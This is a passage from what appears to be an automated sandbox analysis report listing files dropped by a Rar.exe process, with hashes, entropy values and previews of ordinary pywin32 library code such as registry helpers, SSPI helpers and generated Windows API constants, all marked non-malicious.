                                                                                                                                                                                      Entropy (8bit):4.661736923288396
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:++iqs0ePxlBfU3Yc3pRFN9qz7HuL2JSRhm88pFratv1oPM2j2CK2aV4bo/n2123:+7PXq3xp3N9q3HaDGFrawXyC9PE3
                                                                                                                                                                                      MD5:5D28A84AA364BCD31FDB5C5213884EF7
                                                                                                                                                                                      SHA1:0874DCA2AD64E2C957B0A8FD50588FB6652DD8EE
                                                                                                                                                                                      SHA-256:E298DDCFCB0232257FCAA330844845A4E7807C4E2B5BD938929ED1791CD9D192
                                                                                                                                                                                      SHA-512:24C1AD9CE1D7E7E3486E8111D8049EF1585CAB17B97D29C7A4EB816F7BDF34406AA678F449F8C680B7F8F3F3C8BC164EDAC95CCB15DA654EF9DF86C5BEB199A5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Imported by pywin32.pth to bootstrap the pywin32 environment in "portable".# environments or any other case where the post-install script isn't run..#.# In short, there's a directory installed by pywin32 named 'pywin32_system32'.# with some important DLLs which need to be found by Python when some pywin32.# modules are imported..# If Python has `os.add_dll_directory()`, we need to call it with this path..# Otherwise, we add this path to PATH....try:. import pywin32_system32.except ImportError: # Python .3.6: replace ImportError with ModuleNotFoundError. pass.else:. import os.. # We're guaranteed only that __path__: Iterable[str]. # https://docs.python.org/3/reference/import.html#__path__. for path in pywin32_system32.__path__:. if os.path.isdir(path):. if hasattr(os, "add_dll_directory"):. os.add_dll_directory(path). # This is to ensure the pywin32 path is in the beginning to find the. # pywin32 DLLs first an
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11552
                                                                                                                                                                                      Entropy (8bit):4.499300065894434
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:62xH/42BdXjaMMhqH0eRhAcjWKTR7AXTv3Hm5z:66H62H0khAOXV0XTvm5z
                                                                                                                                                                                      MD5:9C5202F60D6DA913C7CAF90DC9373281
                                                                                                                                                                                      SHA1:9F961266AE675DDF9C5FF9AB5047C9D7ECEAAF6A
                                                                                                                                                                                      SHA-256:79AB4108C89ACA419476CE9B96F32966800A3FC159812C10B1AE1E3E67DF2FB5
                                                                                                                                                                                      SHA-512:6D3C07C23A2DCF7838B8D2B2D545598C5B5EADC62370571C824EDB6CA0A2B31222E1E713B5FBBDFA8F86ACF8161D2C134CDA4A1442FB44BD7BBA240FD55F0DC1
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Utilities for the pywin32 tests.import gc.import os.import site.import sys.import unittest..import winerror..##.## General purpose utilities for the test suite..##...# The test suite has lots of string constants containing binary data, but.# the strings are used in various "bytes" contexts..def str2bytes(sval):. if sys.version_info < (3, 0) and isinstance(sval, str):. sval = sval.decode("latin1"). return sval.encode("latin1")...# Sometimes we want to pass a string that should explicitly be treated as.# a memory blob..def str2memory(sval):. if sys.version_info < (3, 0):. return buffer(sval). # py3k.. return memoryview(sval.encode("latin1"))...# Sometimes we want to pass an object that exposes its memory.def ob2memory(ob):. if sys.version_info < (3, 0):. return buffer(ob). # py3k.. return memoryview(ob)...##.## unittest related stuff.##...# This is a specialized TestCase adaptor which wraps a real test..class LeakTestCase(unittest.TestCase):
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:magic text file for file(1) cmd, ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5938
                                                                                                                                                                                      Entropy (8bit):4.44618870200388
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:QWrCPU5+9J3RONAy1jeBPAVkJzjAhF2hAbXxM/ADIWaDyRkI+oiCG/Ym:Q/PU5OQD04VkZEh1OI8FyFApYm
                                                                                                                                                                                      MD5:B4FB724E0920809325DC40BC7E7C2813
                                                                                                                                                                                      SHA1:3C5F3D8966E28C14757B64E5E4BE521DCAFC51F9
                                                                                                                                                                                      SHA-256:298DCE6680D5005FE34240C6AAC3547D98FEFC33A0C4DB5E9F0A32C284ED09B4
                                                                                                                                                                                      SHA-512:5D03A2D921FD49667D88A0D99D457B74F863B6F4F8FBB3620030EB44CDAEAEFCD82F7DABFA5E634A29528ABCB17D4E125868CC52835A3CE0BFC67A1770AC38FA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Magic utility that "redirects" to pywintypesxx.dll.import importlib.machinery.import importlib.util.import os.import sys...def __import_pywin32_system_module__(modname, globs):. # This has been through a number of iterations. The problem: how to. # locate pywintypesXX.dll when it may be in a number of places, and how. # to avoid ever loading it twice. This problem is compounded by the. # fact that the "right" way to do this requires win32api, but this. # itself requires pywintypesXX.. # And the killer problem is that someone may have done 'import win32api'. # before this code is called. In that case Windows will have already. # loaded pywintypesXX as part of loading win32api - but by the time. # we get here, we may locate a different one. This appears to work, but. # then starts raising bizarre TypeErrors complaining that something. # is not a pywintypes type when it clearly is!.. # So in what we hope is the last major iteration of this, we now
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1724
                                                                                                                                                                                      Entropy (8bit):4.998195255193026
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:75h575T5L0y5T5Z5HZ5r5R5dL5/5X5OI5cy5X5h5+HkJ5EO5g0587O5D5/5575ch:7b1dh1TLVjf5pB9xLgHkJyO+067OtbFW
                                                                                                                                                                                      MD5:5DEDB350BE4D6433395E5A20DD87CCD9
                                                                                                                                                                                      SHA1:3B0C06BEB7F09AAFD16D9B76266C1D942A1AEA56
                                                                                                                                                                                      SHA-256:163BA151CB3D18957BDFC6FCECD5B733F679BCCD6F7E70A902E9327AE0152546
                                                                                                                                                                                      SHA-512:F43F5E3436E00447808737D1A2EF3BBD1817FD9F53066707552154A9747BC3B77861C4EDB9E398D15B46E4B946F8B62E7392D28BE3F0199C12AA2E188055987A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import win32ras..stateStrings = {. win32ras.RASCS_OpenPort: "OpenPort",. win32ras.RASCS_PortOpened: "PortOpened",. win32ras.RASCS_ConnectDevice: "ConnectDevice",. win32ras.RASCS_DeviceConnected: "DeviceConnected",. win32ras.RASCS_AllDevicesConnected: "AllDevicesConnected",. win32ras.RASCS_Authenticate: "Authenticate",. win32ras.RASCS_AuthNotify: "AuthNotify",. win32ras.RASCS_AuthRetry: "AuthRetry",. win32ras.RASCS_AuthCallback: "AuthCallback",. win32ras.RASCS_AuthChangePassword: "AuthChangePassword",. win32ras.RASCS_AuthProject: "AuthProject",. win32ras.RASCS_AuthLinkSpeed: "AuthLinkSpeed",. win32ras.RASCS_AuthAck: "AuthAck",. win32ras.RASCS_ReAuthenticate: "ReAuthenticate",. win32ras.RASCS_Authenticated: "Authenticated",. win32ras.RASCS_PrepareForCallback: "PrepareForCallback",. win32ras.RASCS_WaitForModemReset: "WaitForModemReset",. win32ras.RASCS_WaitForCallback: "WaitForCallback",. win32ras.RASCS_Projected: "Projected",. w
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4484
                                                                                                                                                                                      Entropy (8bit):4.387225499230269
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:CDAgwu0aLSqlU0HNrIvqtHR4jUa6wRyC6jSJU9zyoMuMw2mS2Sr33bD8:QAHwq0Sgx4zHPlr33bD8
                                                                                                                                                                                      MD5:CFA098F4BF2CBC4604EA85902A1FA94A
                                                                                                                                                                                      SHA1:C84C5E01878ED40FC2BC8EA6EE7065EB9D8694F8
                                                                                                                                                                                      SHA-256:4513AC3EB7FEE4A80B0D285FA881B94CD1490C17C7C293349976EB7FC0BB5EF3
                                                                                                                                                                                      SHA-512:8FEAF8C8A4A93E64ACBAF22431CAA77D74F17E53D317665E593CCF9265C513B798A95B28FF7ED2272C6C5CF568A199C5DCB4897BD40159E70C64DDC792CF540B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This module is very old and useless in this day and age! It will be.# removed in a few years (ie, 2009 or so...)..import warnings..warnings.warn(. "The regcheck module has been pending deprecation since build 210",. category=PendingDeprecationWarning,.)..import os.import sys..import regutil.import win32api.import win32con...def CheckRegisteredExe(exename):. try:. os.stat(. win32api.RegQueryValue(. regutil.GetRootKey(), regutil.GetAppPathsKey() + "\\" + exename. ). ). # .except SystemError:. except (os.error, win32api.error):. print("Registration of %s - Not registered correctly" % exename)...def CheckPathString(pathString):. for path in pathString.split(";"):. if not os.path.isdir(path):. return "'%s' is not a valid directory!" % path. return None...def CheckPythonPaths(verbose):. if verbose:. print("Python Paths:"). # Check the core path. if verbose:. print("\tCor
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12341
                                                                                                                                                                                      Entropy (8bit):4.867163934678907
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:s0Nxfa7aaG6JxIJ/Erq2K5I0OwWhwA4ob67joc2klFaD4rYtbl:s0NxCmaG6JxIJ/Er25I0OwWhwA4ob67g
                                                                                                                                                                                      MD5:2526CDC3EE6341EC163D8C4A1682279C
                                                                                                                                                                                      SHA1:9C59136C2F1510EDCF495F951A32A0EEA63C6275
                                                                                                                                                                                      SHA-256:0E4EC545FA05064142368E6501152DC290520675343149F299BBE994D6C5B65D
                                                                                                                                                                                      SHA-512:7A26252FEC5FB54A89C10AD26EABFD7BECFF1FB7F9336157E3657497C16D000011DD981C5DAE2A086DCD96FE99A4FA46CD908BCA07645D247800643BAEE7D796
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Some registry helpers..import os.import sys..import win32api.import win32con..error = "Registry utility error"..# A .py file has a CLSID associated with it (why? - dunno!).CLSIDPyFile = "{b51df050-06ae-11cf-ad3b-524153480001}"..RegistryIDPyFile = "Python.File" # The registry "file type" of a .py file.RegistryIDPycFile = "Python.CompiledFile" # The registry "file type" of a .pyc file...def BuildDefaultPythonKey():. """Builds a string containing the path to the current registry key... The Python registry key contains the Python version. This function. uses the version of the DLL used by the current process to get the. registry key currently in use.. """. return "Software\\Python\\PythonCore\\" + sys.winver...def GetRootKey():. """Retrieves the Registry root in use by Python.""". keyname = BuildDefaultPythonKey(). try:. k = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyname). k.close(). return win32con.HKEY_CURRENT_USER. except
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15590
                                                                                                                                                                                      Entropy (8bit):4.735360635701188
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:8EYAX708RP3gd3dP3gsfHhS3R3tFoS3Ry1OHg2TDEG9m4p2IuEIYE0x8GwOyrtPI:oALGJHuFkOv6G5zlXszHPnqj
                                                                                                                                                                                      MD5:03D230AD5621621A0B38C15DB6B56DD0
                                                                                                                                                                                      SHA1:D88B7924743BC73412ED75C2209BDC71CD0D3792
                                                                                                                                                                                      SHA-256:9E9BDAB113FA4909689D17E8888090460684290E4F2D1F7C19897546C6AEDB00
                                                                                                                                                                                      SHA-512:13B3D3478F1CCF0B746059B6E62E3A4B8FA069CB25C9A2C3F57AAF90033066B32034F6DB204143717D986972ED261E627B4C03D26EBEC311636A5B1249E4B419
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".Helper classes for SSPI authentication via the win32security module...SSPI authentication involves a token-exchange "dance", the exact details.of which depends on the authentication provider used. There are also.a number of complex flags and constants that need to be used - in most.cases, there are reasonable defaults...These classes attempt to hide these details from you until you really need.to know. They are not designed to handle all cases, just the common ones..If you need finer control than offered here, just use the win32security.functions directly..""".# Based on Roger Upole's sspi demos..# $Id$.import sspicon.import win32security..error = win32security.error...class _BaseAuth(object):. def __init__(self):. self.reset().. def reset(self):. """Reset everything to an unauthorized state""". self.ctxt = None. self.authenticated = False. self.initiator_name = None. self.service_name = None.. # The next seq_num for an encry
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15697
                                                                                                                                                                                      Entropy (8bit):5.075827160638741
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:OcR7K/jSxpilZaMpRwnrvrzRIfPKCl60J0:OclaVwnrvrzfClrC
                                                                                                                                                                                      MD5:9453DC2AD38FC69224C077BD945110D7
                                                                                                                                                                                      SHA1:10D2438CA799BDDB8C59218EA12A1E68A321B66D
                                                                                                                                                                                      SHA-256:403A89B99178441B8769DE753EF98447F73598F52E30701C81A37E4477B340E0
                                                                                                                                                                                      SHA-512:70071F01B293949ACFA09C7909005363D5832A66FF9A1B43EA00B55A517CE6E2D566FC3B6068A932E19E0355EDA339427CE7BCD7A53568F19FBBEB19AE4C7475
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from c:\microsoft sdk\include\sspi.h.ISSP_LEVEL = 32.ISSP_MODE = 1...def SEC_SUCCESS(Status):. return (Status) >= 0...SECPKG_FLAG_INTEGRITY = 1.SECPKG_FLAG_PRIVACY = 2.SECPKG_FLAG_TOKEN_ONLY = 4.SECPKG_FLAG_DATAGRAM = 8.SECPKG_FLAG_CONNECTION = 16.SECPKG_FLAG_MULTI_REQUIRED = 32.SECPKG_FLAG_CLIENT_ONLY = 64.SECPKG_FLAG_EXTENDED_ERROR = 128.SECPKG_FLAG_IMPERSONATION = 256.SECPKG_FLAG_ACCEPT_WIN32_NAME = 512.SECPKG_FLAG_STREAM = 1024.SECPKG_FLAG_NEGOTIABLE = 2048.SECPKG_FLAG_GSS_COMPATIBLE = 4096.SECPKG_FLAG_LOGON = 8192.SECPKG_FLAG_ASCII_BUFFERS = 16384.SECPKG_FLAG_FRAGMENT = 32768.SECPKG_FLAG_MUTUAL_AUTH = 65536.SECPKG_FLAG_DELEGATION = 131072.SECPKG_FLAG_READONLY_WITH_CHECKSUM = 262144.SECPKG_ID_NONE = 65535..SECBUFFER_VERSION = 0.SECBUFFER_EMPTY = 0.SECBUFFER_DATA = 1.SECBUFFER_TOKEN = 2.SECBUFFER_PKG_PARAMS = 3.SECBUFFER_MISSING = 4.SECBUFFER_EXTRA = 5.SECBUFFER_STREAM_TRAILER = 6.SECBUFFER_STREAM_HEADER = 7.SECBUFFER_NEGOTIATION_INFO = 8.SECBUFFER_PADDING = 9
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):334
                                                                                                                                                                                      Entropy (8bit):4.571035255295966
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:SD4cBz3TqzKdD6Le/VieikwcBTAZ7XGap/892EtQCR6Uh286AI/kJln:A4cBeur/I8TBclvW2+sWl0kJl
                                                                                                                                                                                      MD5:ABBC2A410CB902383B0DCC308BE715F3
                                                                                                                                                                                      SHA1:9E177FF30F49DB4F20145671B5C9F88B278D3C3E
                                                                                                                                                                                      SHA-256:F0467A1CA6FFC066C7ED283CDAE5D2EA76AEFE5B9CC21C3FE096B5D28C23765A
                                                                                                                                                                                      SHA-512:3F5E10EF7C44FE6EF61ECD1CFB0FED21F5D9448C98291485917E0491F4F6EC904131894CA4D8E2425F08FA2FC18210CA4FB32191E8AB3336A9223A6DFB6AC5D9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# win2kras used to be an extension module with wrapped the "new" RAS functions.# in Windows 2000, so win32ras could still be used on NT/etc..# I think in 2021 we can be confident pywin32 is not used on earlier OSs, so.# that functionality is now in win32ras..#.# This exists just to avoid breaking old scripts..from win32ras import *.
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):117047
                                                                                                                                                                                      Entropy (8bit):5.102756787103929
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:aYLzODfYiXGYvTVkcgURPpp0kcNXj3s1VrzieuVoIOSGrv+I23pwkeJyUYziNubq:BjVOmcgUbpSJjI1GeuDGv+rINubI2s
                                                                                                                                                                                      MD5:6D9449506328201C05E643B0D4E65EA1
                                                                                                                                                                                      SHA1:D1F20BB6928C5A6B4DE0EF48CC380D113C61AA90
                                                                                                                                                                                      SHA-256:7DB98CEDA5CD93A5954A5434BD0D77A34825EC772400ED67037A8C87838BDDC7
                                                                                                                                                                                      SHA-512:0209E9D59EFE0B2890CC5BBCEB1B447F408CA4BC84313B8E8A8C1B9235761A4EF15C5E737B626B1AE81D6CD4A39F194682227E415F30D664F15B5FCC06B28449
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from commdlg.h (plus modifications 4jan98).WINVER = 1280.WM_USER = 1024.PY_0U = 0.OFN_READONLY = 1.OFN_OVERWRITEPROMPT = 2.OFN_HIDEREADONLY = 4.OFN_NOCHANGEDIR = 8.OFN_SHOWHELP = 16.OFN_ENABLEHOOK = 32.OFN_ENABLETEMPLATE = 64.OFN_ENABLETEMPLATEHANDLE = 128.OFN_NOVALIDATE = 256.OFN_ALLOWMULTISELECT = 512.OFN_EXTENSIONDIFFERENT = 1024.OFN_PATHMUSTEXIST = 2048.OFN_FILEMUSTEXIST = 4096.OFN_CREATEPROMPT = 8192.OFN_SHAREAWARE = 16384.OFN_NOREADONLYRETURN = 32768.OFN_NOTESTFILECREATE = 65536.OFN_NONETWORKBUTTON = 131072.OFN_NOLONGNAMES = 262144.OFN_EXPLORER = 524288 # new look commdlg.OFN_NODEREFERENCELINKS = 1048576.OFN_LONGNAMES = 2097152 # force long names for 3.x modules.OFN_ENABLEINCLUDENOTIFY = 4194304 # send include message to callback.OFN_ENABLESIZING = 8388608.OFN_DONTADDTORECENT = 33554432.OFN_FORCESHOWHIDDEN = 268435456 # Show All files including System and hidden files.OFN_EX_NOPLACESBAR = 1.OFN_SHAREFALLTHROUGH = 2.OFN_SHARENOWARN = 1.OFN_SHAREWARN = 0.CDN
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):72494
                                                                                                                                                                                      Entropy (8bit):5.132765035748773
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:GUR6nCUZch1pYy64OZWA+PrZ6rBn3CDx5vF9hNJx4GIGZKngFLf0nLVNaRB56oBp:/3YqDMrBn3Ctv4A
                                                                                                                                                                                      MD5:DCC36C5E07BA223144EDC9DA143C5631
                                                                                                                                                                                      SHA1:06CA43F7B6F208F32E1B9A7F0D97785A65FE333C
                                                                                                                                                                                      SHA-256:4E3B2ACAE1B0ACE6DBAFB5ADE99048879F75275423063247BE25FE4749D23EAD
                                                                                                                                                                                      SHA-512:CBEBE171A15DA44AF86F8EA2CBED90B5614928EA1136EB34030AAADBA2A399C36445FFACD8B3CF6A8A2CB41E923C26330303F0E29F1D4BF431562E3C89559C70
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from WinCrypt.h.def GET_ALG_CLASS(x):. return x & (7 << 13)...def GET_ALG_TYPE(x):. return x & (15 << 9)...def GET_ALG_SID(x):. return x & (511)...ALG_CLASS_ANY = 0.ALG_CLASS_SIGNATURE = 1 << 13.ALG_CLASS_MSG_ENCRYPT = 2 << 13.ALG_CLASS_DATA_ENCRYPT = 3 << 13.ALG_CLASS_HASH = 4 << 13.ALG_CLASS_KEY_EXCHANGE = 5 << 13.ALG_CLASS_ALL = 7 << 13.ALG_TYPE_ANY = 0.ALG_TYPE_DSS = 1 << 9.ALG_TYPE_RSA = 2 << 9.ALG_TYPE_BLOCK = 3 << 9.ALG_TYPE_STREAM = 4 << 9.ALG_TYPE_DH = 5 << 9.ALG_TYPE_SECURECHANNEL = 6 << 9.ALG_SID_ANY = 0.ALG_SID_RSA_ANY = 0.ALG_SID_RSA_PKCS = 1.ALG_SID_RSA_MSATWORK = 2.ALG_SID_RSA_ENTRUST = 3.ALG_SID_RSA_PGP = 4.ALG_SID_DSS_ANY = 0.ALG_SID_DSS_PKCS = 1.ALG_SID_DSS_DMS = 2.ALG_SID_DES = 1.ALG_SID_3DES = 3.ALG_SID_DESX = 4.ALG_SID_IDEA = 5.ALG_SID_CAST = 6.ALG_SID_SAFERSK64 = 7.ALG_SID_SAFERSK128 = 8.ALG_SID_3DES_112 = 9.ALG_SID_CYLINK_MEK = 12.ALG_SID_RC5 = 13.ALG_SID_AES_128 = 14.ALG_SID_AES_192 = 15.ALG_SID_AES_256 = 16.ALG_SID_AES = 17.ALG_SID_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7612
                                                                                                                                                                                      Entropy (8bit):4.617430807608831
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:xjfuaURPBUS3onZz6vxVjomyWdLKHUoUNeSm/oGLoFXkPa1mPeeSm6C:xjARPqS3onZz6JVjomLdeHZUYP3Loa+u
                                                                                                                                                                                      MD5:4056059DA5B13E78304894A5DEC5A3EF
                                                                                                                                                                                      SHA1:7223224E6D80F2265E531976843061A344D0202A
                                                                                                                                                                                      SHA-256:92803137353DA3AB0554FF8980F532BDFD994718E0C76BBEBE1DDA72772ACFCC
                                                                                                                                                                                      SHA-512:1148427CDC915EAD9F942A0DCFCFE47BFF784110630CEB202E9F43C0A787282FF926A434D1229C8837B847A4E604DF6A7F09708B1D28C1248889453AD28D8781
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Event Log Utilities - helper for win32evtlog.pyd."""..import win32api.import win32con.import win32evtlog.import winerror..error = win32api.error # The error the evtlog module raises...langid = win32api.MAKELANGID(win32con.LANG_NEUTRAL, win32con.SUBLANG_NEUTRAL)...def AddSourceToRegistry(. appName,. msgDLL=None,. eventLogType="Application",. eventLogFlags=None,. categoryDLL=None,. categoryCount=0,.):. """Add a source of messages to the event log... Allows Python program to register a custom source of messages in the. registry. You must also provide the DLL name that has the message table, so the. full message text appears in the event log... Note that the win32evtlog.pyd file has a number of string entries with just "%1". built in, so many Python programs can simply use this DLL. Disadvantages are that. you do not get language translation, and the full text is stored in the event log,. blowing the size of the log up.. """.. # When an
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):30127
                                                                                                                                                                                      Entropy (8bit):4.825689367996127
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:bECgvkVU6pyZ3N9UmZxqoMUHyMSrU4AGvoDwOSdV9aaZDgKh:bEdAwZ375Zux6mdIKh
                                                                                                                                                                                      MD5:B07124FDD02BB98B79FA59067C88927E
                                                                                                                                                                                      SHA1:7AE2C2F6EFE5CE004C10B993F2DEAD988DDAED9A
                                                                                                                                                                                      SHA-256:EBE1F5BC059EA1B530E701EA649EF8644E09785B72AB1866DF6977C8C0D7A1B4
                                                                                                                                                                                      SHA-512:9798EE222E0E5D98DAFDB4A103C91D6B0AB98D6BE75EBA9B945FD663E9FC0036AB6C3F62630ACED21B168C548D1DDDD3DBA024B4302DB8B97891F450C19B0CBA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# This is a work in progress - see Demos/win32gui_menu.py..# win32gui_struct.py - helpers for working with various win32gui structures..# As win32gui is "light-weight", it does not define objects for all possible.# win32 structures - in general, "buffer" objects are passed around - it is.# the callers responsibility to pack the buffer in the correct format..#.# This module defines some helpers for the commonly used structures..#.# In general, each structure has 3 functions:.#.# buffer, extras = PackSTRUCTURE(items, ...).# item, ... = UnpackSTRUCTURE(buffer).# buffer, extras = EmtpySTRUCTURE(...).#.# 'extras' is always items that must be held along with the buffer, as the.# buffer refers to these object's memory..# For structures that support a 'mask', this mask is hidden from the user - if.# 'None' is passed, the mask flag will not be set, or on return, None will.# be returned for the value if the mask is not set..#.# NOTE: I considered making these structures look like real classes, a
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):43217
                                                                                                                                                                                      Entropy (8bit):4.6681753612382915
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:yQbVsdBQqM8dX/A8G3gu0CIHq4Wo5MGJ0hii1/dK2iy0rM:yQbqtX/A8Gwu0CIHq4Wo5MGJ0H0rM
                                                                                                                                                                                      MD5:3E80C82D1405D405BE8010FA6040C732
                                                                                                                                                                                      SHA1:F34649F7F1998CC0E88D73615DC97D3ED8B26EFA
                                                                                                                                                                                      SHA-256:141EE8BBE50251222119936B059936FCA0108A8F53F25D8C8D76172A73DB688F
                                                                                                                                                                                      SHA-512:7994A0F197AD1B6308B34AAACAAB612D24B89A5CA50D0E9B9043F5DB8C07C29BFA1D85735AEA573B8879C8F99C286B328DA277AFE590EB5539994FA9B0BA101B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Generated by h2py from \mssdk\include\WinInet.h..INTERNET_INVALID_PORT_NUMBER = 0.INTERNET_DEFAULT_PORT = 0.INTERNET_DEFAULT_FTP_PORT = 21.INTERNET_DEFAULT_GOPHER_PORT = 70.INTERNET_DEFAULT_HTTP_PORT = 80.INTERNET_DEFAULT_HTTPS_PORT = 443.INTERNET_DEFAULT_SOCKS_PORT = 1080.INTERNET_MAX_HOST_NAME_LENGTH = 256.INTERNET_MAX_USER_NAME_LENGTH = 128.INTERNET_MAX_PASSWORD_LENGTH = 128.INTERNET_MAX_PORT_NUMBER_LENGTH = 5.INTERNET_MAX_PORT_NUMBER_VALUE = 65535.INTERNET_MAX_PATH_LENGTH = 2048.INTERNET_MAX_SCHEME_LENGTH = 32.INTERNET_KEEP_ALIVE_ENABLED = 1.INTERNET_KEEP_ALIVE_DISABLED = 0.INTERNET_REQFLAG_FROM_CACHE = 0x00000001.INTERNET_REQFLAG_ASYNC = 0x00000002.INTERNET_REQFLAG_VIA_PROXY = 0x00000004.INTERNET_REQFLAG_NO_HEADERS = 0x00000008.INTERNET_REQFLAG_PASSIVE = 0x00000010.INTERNET_REQFLAG_CACHE_WRITE_DISABLED = 0x00000040.INTERNET_REQFLAG_NET_TIMEOUT = 0x00000080.INTERNET_FLAG_RELOAD = -2147483648.INTERNET_FLAG_RAW_DATA = 0x40000000.INTERNET_FLAG_EXISTING_CONNECT = 0x20000000.INTERNET_
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18532
                                                                                                                                                                                      Entropy (8bit):4.901387880502849
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:XFerFC+a4nQVCUc66U5ICst7fPbeK/EZzQ8SLT9Bc7rzrLTgH4k0:ccCUc66U5ICstT/EpZ7v3L
                                                                                                                                                                                      MD5:270657C418E28DF9E73D1696C20FA02D
